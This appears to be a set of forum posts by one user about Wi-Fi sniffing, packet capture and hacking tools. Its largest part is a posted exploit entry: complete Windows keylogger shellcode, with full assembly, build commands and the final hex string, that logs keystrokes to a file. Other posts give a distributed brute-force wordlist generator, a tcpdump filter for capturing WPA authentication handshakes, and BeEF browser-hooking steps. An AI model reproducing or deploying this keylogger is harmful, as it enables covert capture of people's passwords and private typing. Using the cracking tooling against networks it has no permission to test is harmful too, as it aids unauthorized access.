fugu

Consider using an ARP packet fingerprinting tool? # apt-get install arp-scan # arp-fingerprint 192.168.0.2 is more limited because its just using arp packets, but as long as your on the same subnet you shoule be able to read something. And no port information :(

what ever you end up doing, just don't be messing around with this thing when your driving #distracteddriving

Thank you!

I modified it a little bit, is this more like what you wanted to do? $ cat pineap.log | cut -c34- | sort | uniq | cut -c20- | sort | uniq -c | sort -r -n

I hope the formatting holds up ; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes ; Date: Sat Apr 23 18:34:25 GMT 2016 ; Exploit Author: Fugu ; Vendor Homepage: www.microsoft.com ; Version: all afaik ; Tested on: Win7 (im guessing it will work on others) ; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable. ; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format: ; "Virtual-Key Codes", from msdn.microsoft.com website ; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj ; dd if=test.exe bs=1 status=none skip=$((0x200)) count=$((0x3AE-0x200+1)) | xxd -ps | tr -d '\n'; echo section .bss section .data section .text global _start _start: cld ; 00000000 FC xor edx,edx ; 00000001 31D2 mov dl,0x30 ; 00000003 B230 push dword [fs:edx] ; 00000005 64FF32 pop edx ; 00000008 5A mov edx,[edx+0xc] ; 00000009 8B520C mov edx,[edx+0x14] ; 0000000C 8B5214 loc_fh: mov esi,[edx+0x28] ; 0000000F 8B7228 xor eax,eax ; 00000012 31C0 mov ecx,eax ; 00000014 89C1 mov cl,0x3 ; 00000016 B103 loc_18h: lodsb ; 00000018 AC rol eax,byte 0x8 ; 00000019 C1C008 lodsb ; 0000001C AC loop loc_18h ; 0000001D E2F9 lodsb ; 0000001F AC cmp eax,0x4b45524e ; 00000020 3D4E52454B jz loc_2ch ; 00000025 7405 cmp eax,0x6b65726e ; 00000027 3D6E72656B loc_2ch: mov ebx,[edx+0x10] ; 0000002C 8B5A10 mov edx,[edx] ; 0000002F 8B12 jnz loc_fh ; 00000031 75DC mov edx,[ebx+0x3c] ; 00000033 8B533C add edx,ebx ; 00000036 01DA push dword [edx+0x34] ; 00000038 FF7234 mov edx,[edx+0x78] ; 0000003B 8B5278 add edx,ebx ; 0000003E 01DA mov esi,[edx+0x20] ; 00000040 8B7220 add esi,ebx ; 00000043 01DE ;GetProcAddress xor ecx,ecx ; 00000045 31C9 loc_47h: inc ecx ; 00000047 41 lodsd ; 00000048 AD add eax,ebx ; 00000049 01D8 cmp dword [eax],0x50746547 ; 0000004B 813847657450 jnz loc_47h ; 00000051 75F4 cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341 jnz loc_47h ; 0000005A 75EB cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265 jnz loc_47h ; 00000063 75E2 dec ecx ; 00000065 49 mov esi,[edx+0x24] ; 00000066 8B7224 add esi,ebx ; 00000069 01DE mov cx,[esi+ecx*2] ; 0000006B 668B0C4E mov esi,[edx+0x1c] ; 0000006F 8B721C add esi,ebx ; 00000072 01DE mov edx,[esi+ecx*4] ; 00000074 8B148E add edx,ebx ; 00000077 01DA mov edi,edx ; 00000079 89D7 push edx ; 0000007B 52 ;GetModuleHandleA xor eax,eax ; 0000007C 31C0 push eax ; 0000007E 50 push dword 0x41656c64 ; 0000007F 68646C6541 push dword 0x6e614865 ; 00000084 686548616E push dword 0x6c75646f ; 00000089 686F64756C push dword 0x4d746547 ; 0000008E 684765744D push esp ; 00000093 54 push ebx ; 00000094 53 call edi ; 00000095 FFD7 lea esp,[esp+0x14] ; 00000097 8D642414 push eax ; 0000009B 50 ;GetModuleHandleA("USER32.DLL") push dword 0x88014c4c ; 0000009C 684C4C0188 dec byte [esp+0x2] ; 000000A1 FE4C2402 push dword 0x442e3233 ; 000000A5 6833322E44 push dword 0x52455355 ; 000000AA 6855534552 push esp ; 000000AF 54 call eax ; 000000B0 FFD0 xor edx,edx ; 000000B2 31D2 cmp eax,edx ; 000000B4 39D0 jnz loc_f0h ; 000000B6 7538 lea esp,[esp+0xc] ; 000000B8 8D64240C ;LoadLibraryA push edx ; 000000BC 52 push dword 0x41797261 ; 000000BD 6861727941 push dword 0x7262694c ; 000000C2 684C696272 push dword 0x64616f4c ; 000000C7 684C6F6164 push esp ; 000000CC 54 push ebx ; 000000CD 53 call edi ; 000000CE FFD7 lea esp,[esp+0x10] ; 000000D0 8D642410 push eax ; 000000D4 50 ;LoadLibraryA("USER32.DLL") push dword 0x77014c4c ; 000000D5 684C4C0177 dec byte [esp+0x2] ; 000000DA FE4C2402 push dword 0x442e3233 ; 000000DE 6833322E44 push dword 0x52455355 ; 000000E3 6855534552 push esp ; 000000E8 54 call eax ; 000000E9 FFD0 lea esp,[esp+0xc] ; 000000EB 8D64240C push eax ; 000000EF 50 ;GetKeyState loc_f0h: mov edx,eax ; 000000F0 89C2 push dword 0x1657461 ; 000000F2 6861746501 dec byte [esp+0x3] ; 000000F7 FE4C2403 push dword 0x74537965 ; 000000FB 6865795374 push dword 0x4b746547 ; 00000100 684765744B push esp ; 00000105 54 push edx ; 00000106 52 call edi ; 00000107 FFD7 lea esp,[esp+0xc] ; 00000109 8D64240C push eax ; 0000010D 50 ;WriteFile push dword 0x55010165 ; 0000010E 6865010155 dec byte [esp+0x1] ; 00000113 FE4C2401 push dword 0x6c694665 ; 00000117 686546696C push dword 0x74697257 ; 0000011C 6857726974 push esp ; 00000121 54 push ebx ; 00000122 53 call edi ; 00000123 FFD7 lea esp,[esp+0xc] ; 00000125 8D64240C push eax ; 00000129 50 ;CreateFileA push dword 0x141656c ; 0000012A 686C654101 dec byte [esp+0x3] ; 0000012F FE4C2403 push dword 0x69466574 ; 00000133 6874654669 push dword 0x61657243 ; 00000138 6843726561 push esp ; 0000013D 54 push ebx ; 0000013E 53 call edi ; 0000013F FFD7 lea esp,[esp+0xc] ; 00000141 8D64240C push eax ; 00000145 50 push dword 0x16e6962 ; 00000146 6862696E01 dec byte [esp+0x3] ; 0000014B FE4C2403 push dword 0x2e676f6c ; 0000014F 686C6F672E xor ecx,ecx ; 00000154 31C9 push ecx ; 00000156 51 push ecx ; 00000157 51 add byte [esp],0x80 ; 00000158 80042480 push byte +0x4 ; 0000015C 6A04 push ecx ; 0000015E 51 push byte +0x2 ; 0000015F 6A02 push ecx ; 00000161 51 add byte [esp],0x4 ; 00000162 80042404 lea ecx,[esp+0x18] ; 00000166 8D4C2418 push ecx ; 0000016A 51 call eax ; 0000016B FFD0 lea esp,[esp+0x8] ; 0000016D 8D642408 push eax ; 00000171 50 ;main loop loc_172h: xor ecx,ecx ; 00000172 31C9 xor esi,esi ; 00000174 31F6 loc_176h: mov cl,0xff ; 00000176 B1FF mov eax,esi ; 00000178 89F0 cmp al,cl ; 0000017A 38C8 jc loc_180h ; 0000017C 7202 xor esi,esi ; 0000017E 31F6 loc_180h: inc esi ; 00000180 46 push esi ; 00000181 56 call dword [esp+0x10] ; 00000182 FF542410 mov edx,esi ; 00000186 89F2 xor ecx,ecx ; 00000188 31C9 mov cl,0x80 ; 0000018A B180 and eax,ecx ; 0000018C 21C8 xor ecx,ecx ; 0000018E 31C9 cmp eax,ecx ; 00000190 39C8 jz loc_176h ; 00000192 74E2 push edx ; 00000194 52 push ecx ; 00000195 51 lea ecx,[esp] ; 00000196 8D0C24 push ecx ; 00000199 51 push byte +0x1 ; 0000019A 6A01 lea ecx,[esp+0xc] ; 0000019C 8D4C240C push ecx ; 000001A0 51 push dword [esp+0x14] ; 000001A1 FF742414 call dword [esp+0x20] ; 000001A5 FF542420 lea esp,[esp+0x4] ; 000001A9 8D642404 jmp short loc_172h ; 000001AD EBC3 ;the actual shellcode fc31d2b23064ff325a8b520c8b52148b722831c089c1b103acc1c008ace2f9ac3d4e52454b74053d6e72656b8b5a108b1275dc8b533c01daff72348b527801da8b722001de31c941ad01d881384765745075f4817804726f634175eb8178086464726575e2498b722401de668b0c4e8b721c01de8b148e01da89d75231c05068646c6541686548616e686f64756c684765744d5453ffd78d64241450684c4c0188fe4c24026833322e44685553455254ffd031d239d075388d64240c526861727941684c696272684c6f61645453ffd78d64241050684c4c0177fe4c24026833322e44685553455254ffd08d64240c5089c26861746501fe4c24036865795374684765744b5452ffd78d64240c506865010155fe4c2401686546696c68577269745453ffd78d64240c50686c654101fe4c2403687465466968437265615453ffd78d64240c506862696e01fe4c2403686c6f672e31c95151800424806a04516a0251800424048d4c241851ffd08d6424085031c931f6b1ff89f038c8720231f64656ff54241089f231c9b18021c831c939c874e252518d0c24516a018d4c240c51ff742414ff5424208d642404ebc3

Im not sure how to do that in python, but in bash you can do $ cat pineap.log | cut -c34- | sort | uniq -c | sort -n -r | head -100If you just want the ssid's you can do $ cat pineap.log | cut -c53- | sort | uniq -c | sort -n -r | head -100

yeah there was suppose to be a space there, you are correct, I'm constantly plagued with formatting issues when I post here (and everywhere actually) because I try to do everything with JavaScript disabled. It make surfing the web very interesting and fun. Edit: I concur, you could probably get more info with a proxy of some sort. If you have access to a firefox browser, theres an addon that I've used in the past called "Live HTTP Headers" that will be able to pick up all the header info, along with all the get and post variables for the requests to every resource on that site. I wouldn't run that addon for daily use because it might also reveal passwords and things you want to protect. But it will show you all the post variables that will end up in the request. I'm guessing that the header your looking for begins with "POST /xfinitywifi/signup HTTP/1.1"PPS: I think you might have the wrong webpage, this looks like a signup webpage and not a signin webpage

I wrote this a while ago. It works very similar to crunch, but also allows you to break up the whole task into individual parts easily. So you can run it on multiple machines/devices/whatever and the same time. Just needs python. #!/usr/bin/python import getopt, sys charset=['A', 'B'];minpasswordlength=2;maxpasswordlength=4;cores=-1;startindex=-1;endindex=-1;master=False options, remainder = getopt.getopt(sys.argv[1:], '', ['master', 'charset=', 'minp=', 'maxp=', 'cores=', 'startindex=', 'endindex=']) for opt, arg in options: if opt == '--charset': charset = list(arg) elif opt == '--minp': minpasswordlength = int(arg) elif opt == '--maxp': maxpasswordlength = int(arg) elif opt == '--cores': cores = int(arg) elif opt == '--startindex': startindex = int(arg) elif opt == '--endindex': endindex = int(arg) elif opt == '--master': master = True def find_max_index(charset, minpasswordlength, maxpasswordlength): maxindex = 0 charsetlen = len(charset) for l in range(minpasswordlength, maxpasswordlength+1): maxindex += pow(charsetlen, l) return maxindex def index2password(index, charset, minpasswordlength, maxpasswordlength): subsum = 0 charsetlen = len(charset) for l in range(minpasswordlength, maxpasswordlength+1): passwordlength = l subsum += pow(charsetlen, l) if index < subsum: break subindex = (index-subsum) % pow(charsetlen, l) maxvarsize = pow(len(charset), passwordlength) ary = [] for i in range(0,passwordlength): ary.append(charset[(subindex / pow(charsetlen,i)) % charsetlen]) return ''.join(list(reversed(ary))) if master and cores > 0: m=find_max_index(charset, minpasswordlength, maxpasswordlength) for i in range(0,cores): print "python "+sys.argv[0]+" --charset=\""+"".join(charset)+"\" --minp="+str(minpasswordlength)+" --maxp="+str(maxpasswordlength)+" --startindex="+str(int(i*(float(m)/float(cores))))+" --endindex="+str(int((i+1)*(float(m)/float(cores)))-1) elif startindex != -1 and endindex != -1: for index in range(startindex, endindex+1): print index2password(index, charset, minpasswordlength, maxpasswordlength) else: print "Usage: python "+sys.argv[0]+" --master --charset=\"ABC\" --minp=2 --maxp=4 --cores=3" print "\tmaster = create the various commands to split amongst the various devices" print "\tcharset = the characters you have in the password" print "\tminp = minimum number of characters in the password" print "\tmaxp = maximum number of characters in the password" print "\tcores = number of devices you want to split this task up into"

In one terminal I run: $ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080 And in a 2nd terminal I run: $ curl --user-agent "secure_user_agent" -c "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" http://localhost:8080/ ... $ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080 GET / HTTP/1.1 Host: localhost:8080 User-Agent: secure_user_agent Accept: */* As you can see, the COOKIE is not being displayed. But if I use: $ curl --user-agent "secure_user_agent" -b "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" http://localhost:8080/ ... $ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080 GET / HTTP/1.1 Host: localhost:8080 User-Agent: secure_user_agent Accept: */* Cookie: PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2 now the cookie is showing up. im ASSUMEing that its a cookie problem Edit: fixed symbols

DARPA to geeks: Weaponize your toasters for America! http://www.theregister.co.uk/2016/03/12/darpa_weaponize_your_toaster/ ...DARPA is asking researchers, hobbyists and industry vendors to hack away at embedded devices and consumer technology in hopes of finding possible avenues of attack... The agency is holding a special webinar for interested applicants on March 29 and 30. I think this looks really neat!

In the past I've used tcpdump to capture wireless packets, but you have to manually put the card in monitor mode. wlan[0x00] == 0x80 is a Beacon Frame wlan[0x00] == 0x08 is a Data Frame wlan[0x1e:2] == 0x888e is 802.1X Authentication wlan[0x24] == 0x02 is EAPOL sudo tcpdump -i wlan0 -w dumpfile.pcap -s 0 -n \( wlan[0x00] == 0x80 \) or \( wlan[0x00] == 0x08 and wlan[0x1e:2] == 0x888e and wlan[0x24] == 0x02 \) I haven't thoroughly tested the above command for capping the EAPOL part, but I do get a ton of beacon frames. It probably needs a bit of tweaking to get it to cap correctly. (Edit: fixed a typo)

I think the neatest tool for injection is BeEF (which is on the kali distro): cd /usr/share/beef-xss/ ./beef its has a small bit of javascript that sort of automatically refreshes the browser (hook), and allows you to inject your javascript/html on demand. At the very least, it might give you some ideas around how to correct your current problem.

Been wondering this for a while now, didn't get much info from google, maybe someone here knows. Are wifi beacon frames and probe requests broadcasted to all 14 channels in wifi? It seems like it should if the adapter doesn't know what channel to set itself to if its not associated yet. Thank you in advance.

also available from amazon http://www.amazon.com/FAVI-FE01-BL-Wireless-Keyboard-Touchpad/dp/B003UE52ME/

this reminds me a lot of the bf programming language, sudo apt-get install bf "bf ('a Brainfuck interpreter') is a simple and fast interpreterfor the esoteric programming language Brainfuck. It offers some options to define special behavior, which is nice if you take part in Brainfuck programming contests with special rules."

With whole disk encryption there is a small part of the drive thats unencrypted, that's needed to boot the computer, I wrote this script to keep tabs on those important files, and look for changes. It hashes new boot files and stores a copy of them within the script itself in an sqlite database, and also looks for changes in those files over time. The file can get to be 100M+ if you have a lot of boot files, so forewarned. #!/bin/bash EOS=2 while [ 1 ]; do if [ -n "$(cat $0 | head -n $EOS | tail -n 1 | grep '^###########################################################$')" ]; then break; fi EOS=$(($EOS+1)) done SQLITEDB=$(tempfile) SCRIPTFILE=$(tempfile) trap 'rm -f '$SQLITEDB' '$SCRIPTFILE EXIT tail -n +$(($EOS+1)) $0 | base64 -d > $SQLITEDB head -n $EOS $0 > $SCRIPTFILE if [ -z "$1" ]; then echo $EOS sqlite3 $SQLITEDB "CREATE TABLE IF NOT EXISTS hashes(id INTEGER PRIMARY KEY, filename TEXT UNIQUE NOT NULL, md5 TEXT, sha1 TEXT, sha256 TEXT);" sqlite3 $SQLITEDB "CREATE TABLE IF NOT EXISTS contents(id INTEGER, subindex INTEGER, data TEXT);" for i in /boot/initrd.img-*-generic; do if [ -n "$(echo "$i" | grep '/boot/initrd\.img-[0-9]\+\.[0-9]\+\.[0-9]\+-[0-9]\+-generic')" ]; then filename_already_exists="$(sqlite3 $SQLITEDB "SELECT count(filename) FROM hashes WHERE filename = '$i';")" if [ "$filename_already_exists" = "0" ]; then #NEW echo -e "\e[34;1mNEW FILE $i\e[0m" MD5=$(md5sum "$i" | cut -d\ -f1) SHA1=$(sha1sum "$i" | cut -d\ -f1) SHA256=$(sha256sum "$i" | cut -d\ -f1) sqlite3 $SQLITEDB 'INSERT INTO hashes (filename, md5, sha1, sha256) VALUES ("'"$i"'", "'"$MD5"'", "'"$SHA1"'", "'"$SHA256"'");' echo -e "\e[34;1madded hashes...\e[0m" id=$(sqlite3 $SQLITEDB 'SELECT id FROM hashes WHERE filename="'$i'";') echo "id=$id" DATA="$(cat "$i" | gzip -9 | base64 | tr -d '\n' | sed 's/\(.\{16384\}.\{16384\}\)/\1\n/g')" echo -e "\e[34;1mbinary data formated, adding to sqlite db...\e[0m" count=0 for singlerow in $DATA; do sqlite3 $SQLITEDB 'insert into contents (id, subindex, data) VALUES ("'$id'", "'$count'", "'$singlerow'");' count=$(($count+1)) done echo -e "\e[34;1m[+] $i HAS BEEN ADDED TO THE DATABASE\e[0m" elif [ "$filename_already_exists" = "1" ]; then #EXISTS MD5=$(md5sum "$i" | cut -d\ -f1) SHA1=$(sha1sum "$i" | cut -d\ -f1) SHA256=$(sha256sum "$i" | cut -d\ -f1) verify="$(sqlite3 $SQLITEDB "SELECT count(filename) FROM hashes WHERE filename = '$i' AND md5 = '$MD5' AND sha1 = '$SHA1' AND sha256 = '$SHA256';")" if [ "$verify" = "1" ]; then echo -e "\e[32;1m$i HAS NOT CHANGED\e[0m" elif [ "$verify" = "0" ]; then echo -e "\e[31;1m$i HAS CHANGED\e[0m" else echo "ERROR PROCESSING $i" 1>&2 exit 1 fi else echo "Error: database did not query correctly" 1>&2 exit 1 fi fi done else sqlite3 $SQLITEDB "$1" fi cat $SCRIPTFILE > $0 cat $SQLITEDB | base64 >> $0 exit 0; ###########################################################

does this work? w3m https://cable.nnu.com/cablewifi/?client-mac=$(cat/sys/class/net/wlan0/address)

I have a problem with this statement. Because you can't permanently update a livecd, when a problem becomes known with some software thats running on the livecd, it's vulnerable, and a keylogger can be installed on the current running instance of the OS. Of course when you restart it, the keylogger will be gone, but being still vulnerable, the keylogger can be replaced back onto the new running instance of the OS. In some ways, you might be more vulnerable using a livecd. just my 2 cents :)

I would also like to add that an exploit that is not able to execute remote code, but is able to crash the remote service can be called a Denial of Service Exploit. I don't think an exploit could ever be called a DDOS exploit.

I came across this neat piece of software that I thought Id share, it really works pretty well too. tcpflow is in the repos (apt-get install tcpflow). It's used to parse through those giant pcap files and extract out images and html and js and just about everything thats not encrypted. I've found it very useful to see where my websites are misbehaving and made it faster to correct them. One thing to note, Ive found it seems to not like the newer pcapng format so much and prefers the older pcap format.

Just a theoretical idea, but if your monitoring software is vulnerable, it can still be attacked, just from listening on a network. Back in December 2014, there were 4 vulnerabilities discovered for "tcpdump" which up until that time I thought was rock solid software. But these vulnerabilities allowed for the possibility of remote execution of code and it would be possible to have malformed packets travelling over the wire and blindly exploit the hidden monitor. Granted I agree the chance for this is probably low, but I think it's still a possibility. Libpcap is a pretty big piece of software!

what I ment to say was, I thought the lan star physically separated the read/write cables so that even if the raspi was exploited, it physically couldn't write out over the line. kinda like this article, but for traffic in both directions. http://www.linuxjournal.com/article/6985 .In monitor mode, if the pi was exploited if could have its mode changed and start writing back out onto the network. I've also heard (but many years ago, and is probably now the case any more) that sometimes arp packets would be leaked corresponding to the mac address of the adapter, even in monitor mode.

Isn't the Lan star a Read-Only device? meaning that it prohibits traffic leaving the tap device? If your going to roll your own, make sure its not able to transmit anything.

you have 4 MAC addresses that your router is talking too; find out if/which one doesn't belong: 00:1C:25:DC:41:67 Hon Hai Precision Ind. Co.,Ltd. 28:E3:47:29:65:8D Liteon Technology Corporation C0:9F:42:D0:16:9A Apple, Inc. E4:12:1D:53:73:3B Samsung Electronics Co.,Ltd

http://www.usatoday.com/story/tech/2014/04/22/mind-reading-brain-scans/7747831/